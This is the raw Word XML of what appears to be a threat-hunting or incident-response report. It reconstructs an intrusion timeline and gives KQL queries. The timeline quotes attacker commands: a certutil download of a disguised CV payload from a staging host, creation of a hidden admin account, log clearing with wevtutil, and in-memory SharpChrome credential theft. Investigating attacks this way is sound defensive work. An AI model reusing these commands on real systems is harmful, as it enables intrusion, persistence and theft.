    <w:p w:rsidR="4BC54C03" w:rsidP="65FB3171" w:rsidRDefault="4BC54C03" w14:paraId="393E18D0" w14:textId="5F00F5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BC54C03">
        <w:drawing>
          <wp:inline wp14:editId="36F67760" wp14:anchorId="222990E4">
            <wp:extent cx="5943600" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1547825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825467" name="Picture 1547825467"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId315697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2B66A" w:rsidP="65FB3171" w:rsidRDefault="68B2B66A" w14:paraId="28343E72" w14:textId="1FB626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B2B66A">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T04:29:43.9940417Z  </w:t>
      </w:r>
      <w:r w:rsidR="4A49C866">
        <w:rPr/>
        <w:t xml:space="preserve">The attacker then </w:t>
      </w:r>
      <w:r w:rsidR="4A49C866">
        <w:rPr/>
        <w:t>attempted</w:t>
      </w:r>
      <w:r w:rsidR="4A49C866">
        <w:rPr/>
        <w:t xml:space="preserve"> to laterlly move to 10.1.0.183 and 10.1.0.203</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4A49C866" w:rsidP="65FB3171" w:rsidRDefault="4A49C866" w14:paraId="0AAA5FEC" w14:textId="36B5BC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49C866">
        <w:drawing>
          <wp:inline wp14:editId="6C550EA9" wp14:anchorId="04B2FB6E">
            <wp:extent cx="5943600" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57811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117883" name="Picture 578117883"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId506229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F17A6" w:rsidP="65FB3171" w:rsidRDefault="1CDF17A6" w14:paraId="0E3FF78D" w14:textId="6B5F79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DF17A6">
        <w:rPr/>
        <w:t>2026-01-15T04:36:11.2733322Z - The attacker then pings devices AS-SRV and AS-PC2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1CDF17A6" w:rsidP="65FB3171" w:rsidRDefault="1CDF17A6" w14:paraId="53C2E0A6" w14:textId="4CAE40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DF17A6">
        <w:drawing>
          <wp:inline wp14:editId="254D217F" wp14:anchorId="669DA1B8">
            <wp:extent cx="5943600" cy="314325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1647122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122460" name="Picture 1647122460"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1915244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8D24C" w:rsidP="65FB3171" w:rsidRDefault="6408D24C" w14:paraId="0F5E4714" w14:textId="34E9F3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408D24C">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T04:39:48.0233414Z - The attacker then </w:t>
      </w:r>
      <w:r w:rsidR="6408D24C">
        <w:rPr/>
        <w:t>attempted</w:t>
      </w:r>
      <w:r w:rsidR="6408D24C">
        <w:rPr/>
        <w:t xml:space="preserve"> to pivot to 10.1.0.183 via "mstsc.exe".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34EAF35E" w:rsidP="65FB3171" w:rsidRDefault="34EAF35E" w14:paraId="1908273D" w14:textId="614297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EAF35E">
        <w:drawing>
          <wp:inline wp14:editId="5786D474" wp14:anchorId="3D1D88AF">
            <wp:extent cx="5943600" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="114848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488698" name="Picture 1148488698"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1647472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AF35E" w:rsidP="65FB3171" w:rsidRDefault="34EAF35E" w14:paraId="72674833" w14:textId="3F766C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EAF35E">
        <w:drawing>
          <wp:inline wp14:editId="6424F091" wp14:anchorId="4A20BAEE">
            <wp:extent cx="5943600" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1613711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711594" name="Picture 1613711594"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1559614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AF35E" w:rsidP="65FB3171" w:rsidRDefault="34EAF35E" w14:paraId="41687094" w14:textId="730C79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EAF35E">
        <w:rPr/>
        <w:t>2026-01-15T04:57:47.0153078Z - The attacker then used net and net1 to create user “</w:t>
      </w:r>
      <w:r w:rsidR="34EAF35E">
        <w:rPr/>
        <w:t>svc_backup</w:t>
      </w:r>
      <w:r w:rsidR="34EAF35E">
        <w:rPr/>
        <w:t xml:space="preserve">” and added that user to the </w:t>
      </w:r>
      <w:r w:rsidR="625E5A1F">
        <w:rPr/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="34EAF35E">
        <w:rPr/>
        <w:t>Administrators</w:t>
      </w:r>
      <w:r w:rsidR="4A2B2BF4">
        <w:rPr/>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="34EAF35E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="34EAF35E">
        <w:rPr/>
        <w:t>local</w:t>
      </w:r>
      <w:r w:rsidR="060B8D5B">
        <w:rPr/>
        <w:t>group</w:t>
      </w:r>
      <w:r w:rsidR="0DF30827">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34EAF35E" w:rsidP="65FB3171" w:rsidRDefault="34EAF35E" w14:paraId="6B548140" w14:textId="07A4BE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EAF35E">
        <w:drawing>
          <wp:inline wp14:editId="57DD4B44" wp14:anchorId="03CC15DB">
            <wp:extent cx="5943600" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1429504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504030" name="Picture 1429504030"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId213003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072522" w:rsidP="65FB3171" w:rsidRDefault="77072522" w14:paraId="2DE9C00D" w14:textId="7B2A83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072522">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T05:07:59.3250724Z - Then </w:t>
      </w:r>
      <w:r w:rsidR="77072522">
        <w:rPr/>
        <w:t>wevtutil</w:t>
      </w:r>
      <w:r w:rsidR="77072522">
        <w:rPr/>
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:r w:rsidR="77072522">
        <w:rPr/>
        <w:t>utilized</w:t>
      </w:r>
      <w:r w:rsidR="77072522">
        <w:rPr/>
        <w:t xml:space="preserve"> to clear the Security, System, Application, and PowerShell logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77072522" w:rsidP="65FB3171" w:rsidRDefault="77072522" w14:paraId="1A02CC3B" w14:textId="3AEA2B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072522">
        <w:drawing>
          <wp:inline wp14:editId="3AC77F2C" wp14:anchorId="14C9EE9B">
            <wp:extent cx="5943600" cy="1171575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129045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450419" name="Picture 1290450419"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2145672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812B3" w:rsidP="65FB3171" w:rsidRDefault="6EA812B3" w14:paraId="1B6993C0" w14:textId="701328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EA812B3">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T05:09:53.3995975Z - The </w:t>
      </w:r>
      <w:r w:rsidR="6EA812B3">
        <w:rPr/>
        <w:t>initial</w:t>
      </w:r>
      <w:r w:rsidR="6EA812B3">
        <w:rPr/>
        <w:t xml:space="preserve"> payload (daniel_richardson_cv.pdf.exe) launched Notepad with “notepad.exe "".”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2992870D" w:rsidP="65FB3171" w:rsidRDefault="2992870D" w14:paraId="034F70C3" w14:textId="65E3B5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992870D">
        <w:drawing>
          <wp:inline wp14:editId="62D11B31" wp14:anchorId="1D56D7F8">
            <wp:extent cx="5943600" cy="295275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1689398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398183" name="Picture 1689398183"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId970481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D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="776CB47B" w14:textId="58FB165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>KQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="08BB770F" w14:textId="1C553E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>DeviceEvents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="7EA18772" w14:textId="7194B1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>| where InitiatingProcessFileName =~ "notepad.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="5569318E" w14:textId="431036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>| where DeviceName =~ "AS-PC1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="7D1D1F74" w14:textId="32C9B0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>| project Timestamp,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="3B19DAE1" w14:textId="3A4129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DeviceName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="5C203B72" w14:textId="782467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ActionType,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="2D7BF6B3" w14:textId="0A4F05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FileName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="5B79C441" w14:textId="27643B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InitiatingProcessFileName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="110EDF74" w14:textId="3350DE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InitiatingProcessId,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="4E9F65A9" w14:textId="5354B8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ReportId,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="3D4A76C5" w14:textId="07480D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          AdditionalFields</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="162D1A35" w:rsidP="65FB3171" w:rsidRDefault="162D1A35" w14:paraId="46EADD91" w14:textId="442FBF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2D1A35">
        <w:rPr/>
        <w:t xml:space="preserve">| order by Timestamp </w:t>
      </w:r>
      <w:r w:rsidR="162D1A35">
        <w:rPr/>
        <w:t>asc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68D574CA" w:rsidP="65FB3171" w:rsidRDefault="68D574CA" w14:paraId="04ABF6E1" w14:textId="0973E5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D574CA">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T05:10:08.3776023Z - </w:t>
      </w:r>
      <w:r w:rsidR="68D574CA">
        <w:rPr/>
        <w:t>ActionType</w:t>
      </w:r>
      <w:r w:rsidR="68D574CA">
        <w:rPr/>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="68D574CA">
        <w:rPr/>
        <w:t>ClrUnbackedModuleLoaded</w:t>
      </w:r>
      <w:r w:rsidR="68D574CA">
        <w:rPr/>
        <w:t xml:space="preserve">” stood out because it is indicative </w:t>
      </w:r>
      <w:r w:rsidR="78294640">
        <w:rPr/>
        <w:t xml:space="preserve">of a </w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="0F59DDF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Common Language Runtime (CLR) module</w:t>
      </w:r>
      <w:r w:rsidR="78294640">
        <w:rPr/>
        <w:t xml:space="preserve"> being loaded from memory instead of a file on a disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68D574CA" w:rsidP="65FB3171" w:rsidRDefault="68D574CA" w14:paraId="49EC9576" w14:textId="331D88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D574CA">
        <w:drawing>
          <wp:inline wp14:editId="23A231D1" wp14:anchorId="14D9310F">
            <wp:extent cx="5943600" cy="1685925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="240360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360148" name="Picture 240360148"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1998385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CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="19EBD95E" w14:textId="5865EC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KQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="465CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="2CC4DA83" w14:textId="045454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DeviceEvents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="465CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="193D3418" w14:textId="2E499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| where InitiatingProcessFileName =~ "notepad.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="465CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="0F245839" w14:textId="2D688D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| where DeviceName =~ "AS-PC1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="465CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="76E67EA1" w14:textId="45EE39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| where ActionType =~ "ClrUnbackedModuleLoaded"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="465CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="11AB1C9D" w14:textId="4C575D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| project Timestamp,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="465CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="3685BBF1" w14:textId="4C76EC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 xml:space="preserve">          DeviceName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="465CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="707469AC" w14:textId="1879E7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 xml:space="preserve">          ActionType,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="465CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="49A3E1E0" w14:textId="2C53DC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 xml:space="preserve">          FileName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="465CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="2BAF606F" w14:textId="0A99E9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 xml:space="preserve">          AdditionalFields</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="465CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="54674F25" w14:textId="012D20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>| order by Timestamp asc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65FB3171" w:rsidP="65FB3171" w:rsidRDefault="65FB3171" w14:paraId="5DC0478D" w14:textId="13F5D0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65CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="79EB96AB" w14:textId="7C4E26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rPr/>
        <w:t xml:space="preserve">2026-01-15T05:10:08.3776023Z - </w:t>
      </w:r>
      <w:r w:rsidR="4074F958">
        <w:rPr/>
        <w:t>Action type “</w:t>
      </w:r>
      <w:r w:rsidR="4074F958">
        <w:rPr/>
        <w:t>ClrUnbackedModuleLoaded</w:t>
      </w:r>
      <w:r w:rsidR="4074F958">
        <w:rPr/>
        <w:t>” with a Module of “</w:t>
      </w:r>
      <w:r w:rsidR="4074F958">
        <w:rPr/>
        <w:t>SharpChrome</w:t>
      </w:r>
      <w:r w:rsidR="4074F958">
        <w:rPr/>
        <w:t xml:space="preserve">” is indicative that </w:t>
      </w:r>
      <w:r w:rsidR="46E1E7E1">
        <w:rPr/>
        <w:t>the credential theft tool was loaded directly from memory into Notepad.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="465CD938" w:rsidP="65FB3171" w:rsidRDefault="465CD938" w14:paraId="089AD7ED" w14:textId="31E96D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65CD938">
        <w:drawing>
          <wp:inline wp14:editId="405159ED" wp14:anchorId="27A448D4">
            <wp:extent cx="5943600" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="883811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11489" name="Picture 883811489"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1591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7B461" w:rsidP="65FB3171" w:rsidRDefault="1717B461" w14:paraId="40C58B82" w14:textId="42F3E3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717B461">
        <w:rPr/>
        <w:t>2026-01-15T04:40:31.9488698Z - Investigation of as-pc2 begins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="67D7BB0C" w14:textId="24A47C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Device – as-pc2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="5DFF2E0F" w14:textId="0CBE61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User - david.mitchell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="785BC496" w14:textId="72F443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KQL Query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65FB3171" w:rsidP="65FB3171" w:rsidRDefault="65FB3171" w14:paraId="3D7AF8C1" w14:textId="12E516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9E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="18A1C307" w14:textId="68818B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DeviceProcessEvents </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="2A8F26CB" w14:textId="5216AD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| where DeviceName =~ "as-pc2" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="286D9EC9" w14:textId="7F8545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//| where AccountName =~ "Sophie.Turner" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="38DCF589" w14:textId="4C929E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//| where InitiatingProcessFileName =~ "Daniel_Richardson_CV.pdf.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="513255BF" w14:textId="097622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| project</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="0D4012AB" w14:textId="13D1CE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Timestamp, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="3A15E846" w14:textId="3FC6AA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DeviceName,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="13480EB2" w14:textId="063432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AccountName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="2DF61478" w14:textId="6880C0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FileName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="261D10D1" w14:textId="5B6F90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FolderPath, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="517CDA68" w14:textId="5AE581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ProcessCommandLine, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="3D3092B9" w14:textId="32B583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SHA256,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="51578E14" w14:textId="23CBFA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InitiatingProcessFileName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="6EDB4E86" w14:textId="55CB96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InitiatingProcessCommandLine, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="646D14AC" w14:textId="1F01F8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InitiatingProcessSHA256,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="2D1E79F4" w14:textId="331711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InitiatingProcessId,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="3E851E1E" w14:textId="7016F2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    InitiatingProcessParentFileName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="732C049E" w14:textId="7FAA93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>| order by Timestamp desc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65FB3171" w:rsidP="65FB3171" w:rsidRDefault="65FB3171" w14:paraId="6B443250" w14:textId="664F4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9E019C1" w:rsidP="65FB3171" w:rsidRDefault="49E019C1" w14:paraId="0B6CDC27" w14:textId="27C27D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E019C1">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T04:40:31.9488698Z - </w:t>
      </w:r>
      <w:r w:rsidR="7F56D853">
        <w:rPr/>
        <w:t xml:space="preserve">The local administrator account was activated with </w:t>
      </w:r>
      <w:r w:rsidR="49E019C1">
        <w:rPr/>
        <w:t>"net.exe" user Administrator /</w:t>
      </w:r>
      <w:r w:rsidR="49E019C1">
        <w:rPr/>
        <w:t>active:yes</w:t>
      </w:r>
      <w:r w:rsidR="44C0584D">
        <w:rPr/>
        <w:t>. The password was then changed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="44C0584D" w:rsidP="65FB3171" w:rsidRDefault="44C0584D" w14:paraId="7EAE668F" w14:textId="09A189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C0584D">
        <w:drawing>
          <wp:inline wp14:editId="1F6D3BE7" wp14:anchorId="51838BD7">
            <wp:extent cx="5943600" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="468031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031742" name="Picture 468031742"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId52177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0584D" w:rsidP="65FB3171" w:rsidRDefault="44C0584D" w14:paraId="34D7A878" w14:textId="412950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C0584D">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T04:40:56.7316101Z - </w:t>
      </w:r>
      <w:r w:rsidR="44C0584D">
        <w:rPr/>
        <w:t>AnyDesk</w:t>
      </w:r>
      <w:r w:rsidR="44C0584D">
        <w:rPr/>
        <w:t xml:space="preserve"> was downloaded via “"certutil.exe" -</w:t>
      </w:r>
      <w:r w:rsidR="44C0584D">
        <w:rPr/>
        <w:t>urlcache</w:t>
      </w:r>
      <w:r w:rsidR="44C0584D">
        <w:rPr/>
        <w:t xml:space="preserve"> -split -f https://download.anydesk.com/AnyDesk.exe C:\Users\Public\AnyDesk.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="44C0584D" w:rsidP="65FB3171" w:rsidRDefault="44C0584D" w14:paraId="5E09F1E8" w14:textId="7CAD7A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C0584D">
        <w:drawing>
          <wp:inline wp14:editId="6068FE5B" wp14:anchorId="6C71FEED">
            <wp:extent cx="5943600" cy="171450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="197000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009823" name="Picture 1970009823"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId100922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8A16F" w:rsidP="65FB3171" w:rsidRDefault="1698A16F" w14:paraId="029D894F" w14:textId="048557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698A16F">
        <w:drawing>
          <wp:inline wp14:editId="152BB1B0" wp14:anchorId="23CA92B8">
            <wp:extent cx="5943600" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1726950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950864" name="Picture 1726950864"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1107747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8A3531" w:rsidP="65FB3171" w:rsidRDefault="198A3531" w14:paraId="7B15B533" w14:textId="38190F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98A3531">
        <w:rPr/>
        <w:t>2026-01-15T04:43:52.1614498Z - Libre office is then used to open “BACS_Payments_Dec2025.ods</w:t>
      </w:r>
      <w:r w:rsidR="65C56CBF">
        <w:rPr/>
        <w:t>” from the “Payroll” directory on “AS-SRV”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="198A3531" w:rsidP="65FB3171" w:rsidRDefault="198A3531" w14:paraId="03F2A137" w14:textId="12DBFF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98A3531">
        <w:rPr/>
        <w:t>"soffice.exe" -o "\\AS-SRV\Payroll\BACS_Payments_Dec2025.ods"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0238398A" w:rsidP="65FB3171" w:rsidRDefault="0238398A" w14:paraId="20F13B02" w14:textId="6F1707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38398A">
        <w:drawing>
          <wp:inline wp14:editId="07BE4A0F" wp14:anchorId="13918AD2">
            <wp:extent cx="5943600" cy="514350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="138051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51455" name="Picture 138051455"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1208118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8398A" w:rsidP="65FB3171" w:rsidRDefault="0238398A" w14:paraId="1C02BFB5" w14:textId="20F65C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38398A">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T04:52:22.9618142Z </w:t>
      </w:r>
      <w:r w:rsidR="24B7C2DA">
        <w:rPr/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="0238398A">
        <w:rPr/>
        <w:t>Certutil</w:t>
      </w:r>
      <w:r w:rsidR="0238398A">
        <w:rPr/>
        <w:t xml:space="preserve"> is then used to reach out to</w:t>
      </w:r>
      <w:r w:rsidR="5158151A">
        <w:rPr/>
        <w:t xml:space="preserve"> the payload staging site</w:t>
      </w:r>
      <w:r w:rsidR="0238398A">
        <w:rPr/>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:hyperlink r:id="R05c9bc2f17804c79">
        <w:r w:rsidRPr="65FB3171" w:rsidR="0238398A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sync.cloud-endpoint.net/</w:t>
        </w:r>
        <w:r w:rsidRPr="65FB3171" w:rsidR="28AE8489">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>”</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0238398A">
        <w:rPr/>
        <w:t xml:space="preserve"> to download “Daniel_Richardson_CV.pdf.exe” to “C:\Users\Public\”</w:t>
      </w:r>
      <w:r w:rsidR="5C312B24">
        <w:rPr/>
        <w:t xml:space="preserve"> as “RuntimeBroker.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0238398A" w:rsidP="65FB3171" w:rsidRDefault="0238398A" w14:paraId="63548AC2" w14:textId="0309DA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238398A">
        <w:rPr/>
        <w:t>"certutil.exe" -</w:t>
      </w:r>
      <w:r w:rsidR="0238398A">
        <w:rPr/>
        <w:t>urlcache</w:t>
      </w:r>
      <w:r w:rsidR="0238398A">
        <w:rPr/>
        <w:t xml:space="preserve"> -split -f https://sync.cloud-endpoint.net/Daniel_Richardson_CV.pdf.exe C:\Users\Public\RuntimeBroker.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="10A5B952" w:rsidP="65FB3171" w:rsidRDefault="10A5B952" w14:paraId="61A2DB5A" w14:textId="77F052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A5B952">
        <w:drawing>
          <wp:inline wp14:editId="22FCE6D7" wp14:anchorId="6742C671">
            <wp:extent cx="5943600" cy="266700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1883104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04680" name="Picture 1883104680"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1373903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174B6" w:rsidP="65FB3171" w:rsidRDefault="7A1174B6" w14:paraId="4FFF7C4D" w14:textId="2DA2B1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1174B6">
        <w:rPr/>
        <w:t>2026-01-15T04:52:32.6871861Z - A scheduled task named “</w:t>
      </w:r>
      <w:r w:rsidR="7A1174B6">
        <w:rPr/>
        <w:t>MicrosoftEdgeUpdateCheck</w:t>
      </w:r>
      <w:r w:rsidR="7A1174B6">
        <w:rPr/>
